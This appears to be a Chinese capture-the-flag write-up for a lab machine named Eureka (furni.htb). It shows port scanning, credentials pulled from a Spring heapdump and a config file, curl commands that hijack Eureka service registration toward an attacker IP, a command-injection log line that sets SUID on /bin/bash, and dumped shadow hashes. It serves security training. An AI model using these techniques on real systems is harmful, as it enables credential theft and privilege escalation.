基本信息

端口扫描

22和80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
$ nmap -sC -sV -Pn 10.10.11.66
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-03 09:07 JST
Nmap scan report for 10.10.11.66
Host is up (0.18s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT      STATE    SERVICE VERSION
4/tcp     filtered unknown
22/tcp    open     ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 d6:b2:10:42:32:35:4d:c9:ae:bd:3f:1f:58:65:ce:49 (RSA)
|   256 90:11:9d:67:b6:f6:64:d4:df:7f:ed:4a:90:2e:6d:7b (ECDSA)
|_  256 94:37:d3:42:95:5d:ad:f7:79:73:a6:37:94:45:ad:47 (ED25519)
80/tcp    open     http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://furni.htb/
548/tcp   filtered afp
4444/tcp  filtered krb524
5959/tcp  filtered unknown
14442/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.70 seconds

80

需要加hosts:

1
10.10.11.66 furni.htb

家居相关的网页:

actuator

burp插件的话很容易发现,常规目录扫描的话根据404页面也可以知道是spring:

heapdump

heapdump中获取到一个密码:

1
2
3
4
java -jar JDumpSpider-1.1-SNAPSHOT-full.jar heapdump

password = 0sc@r190_S0l!dP@sswd
username = oscar190

oscar190

得到的oscar190账号密码ssh登录,查看网络还可以发现前面常规端口扫描漏掉的8761:

8761

因为是spring再加上机器名字,8761应该就是Eureka,需要认证信息

Eureka

常规翻文件得到Eureka账号密码:

1
2
3
oscar190@eureka:/var/www/web/cloud-gateway/src/main/resources$ cat application.yaml

defaultZone: http://EurekaSrvr:0scarPWDisTheB3st@localhost:8761/eureka/

Eureka

使用得到的账号密码登录Eureka:

搜索可以找到针对eureka的攻击方式

大概流程就是我们修改它会定期访问的app,从而获得认证信息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# 添加instance
curl -X POST http://EurekaSrvr:0scarPWDisTheB3st@furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE -H 'Content-Type: application/json' -d '{
    "instance": {
        "instanceId": "USER-MANAGEMENT-SERVICE",
        "hostName": "10.10.14.3",  
        "app": "USER-MANAGEMENT-SERVICE",
        "ipAddr": "10.10.14.3",
        "vipAddress": "USER-MANAGEMENT-SERVICE",
        "secureVipAddress": "USER-MANAGEMENT-SERVICE",
        "status": "UP",
        "port": { "$": 4444, "@enabled": "true" },
        "dataCenterInfo": {
            "@class": "com.netflix.appinfo.InstanceInfo$DefaultDataCenterInfo",
            "name": "MyOwn"
        }
    }
}'

# 删除原有instance
curl -su EurekaSrvr:0scarPWDisTheB3st \
     -X DELETE \
     'http://furni.htb:8761/eureka/apps/USER-MANAGEMENT-SERVICE/localhost:USER-MANAGEMENT-SERVICE:8081'

username=miranda.wise@furni.htb
password=IL!veT0Be&BeT0L0ve

user flag

得到的用户名和密码登录,注意用户名稍微有点区别,是miranda-wise:

提权信息

常规pspy,可以发现root定期运行/opt/log_analyse.sh去分析指定日志文件:

查看log_analyse.sh可以发现一个很明显的命令注入,code直接从文件中获取然后带入:

提权 & root flag

所以就是写入恶意日志,等待命令触发执行:

1
2
3
rm -f /var/www/web/user-management-service/log/application.log

echo 'HTTP Status: x[$(chmod +s /bin/bash)]' > /var/www/web/user-management-service/log/application.log

shadow

1
2
3
root:$6$OBLuDSnSI6fzrKsf$u9QRtUqJYklvj0ve0W792/K0OFtjkezL5d/glicQuh.wd2Zghc5DU5AR8wy3WqSN4XE4URKuT2Q.TvVn8V6aG.:19947:0:99999:7:::
oscar190:$6$CCVgNnsseJFcoNGs$gzae.Om25l/QR2NNsAEeulOjuPVf.UxaTupSl.TIePjM47QM1PvPaFLY2I/BTM0kyltIHJ7MB3L8rBAnu8e501:19936:0:99999:7:::
miranda-wise:$6$cceIW.FRVwHUaXms$/A4OpW8llje8ChgjPMbb81eEs.SiaivbvJyoOFtDmF9loeQ.tU3G6yMQz3B5tThwjgPr7j/XZV4TrbqQhKTif1:19936:0:99999:7:::

参考资料